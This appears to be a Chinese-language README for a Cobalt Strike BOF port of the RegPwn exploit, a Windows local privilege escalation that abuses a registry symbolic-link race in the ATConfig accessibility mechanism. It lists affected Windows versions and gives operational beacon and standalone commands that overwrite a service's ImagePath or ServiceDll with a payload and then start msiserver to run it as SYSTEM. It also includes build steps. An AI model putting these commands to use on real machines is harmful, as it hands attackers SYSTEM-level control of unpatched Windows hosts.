Cobalt Strike BOF 移植自 Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach 的 RegPwn 漏洞利用程序。
这是原始 C# 漏洞利用程序的粗糙 BOF 重新实现。所有漏洞研究和利用的功劳归于 Filip Dragovic 和 MDSec。
利用 Windows 辅助功能 ATConfig 机制中的注册表符号链接竞争条件,从普通用户上下文向受保护的 HKLM 注册表键写入任意值(本地权限提升)。
目标为 Windows 11 25H2/24H2、Windows 10 21H2 以及 Windows Server 2016/2019/2022 在 2026 年 3 月补丁之前的版本。
警告: 此漏洞利用会在竞争条件过程中锁定工作站。
msiserver(Windows Installer)服务的 ImagePath。该服务以 SYSTEM 身份运行,且普通用户可启动。
在脚本管理器中加载 regpwn.cna,然后:
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath
漏洞利用成功后,启动服务以 SYSTEM 身份执行:
net start msiserver
需要 x86_64-w64-mingw32-gcc(MinGW-w64 交叉编译器)。
make # 构建 BOF (regpwn.x64.o)
make test # 构建独立 EXE (regpwn.x64.exe)
make clean
仅支持 x64。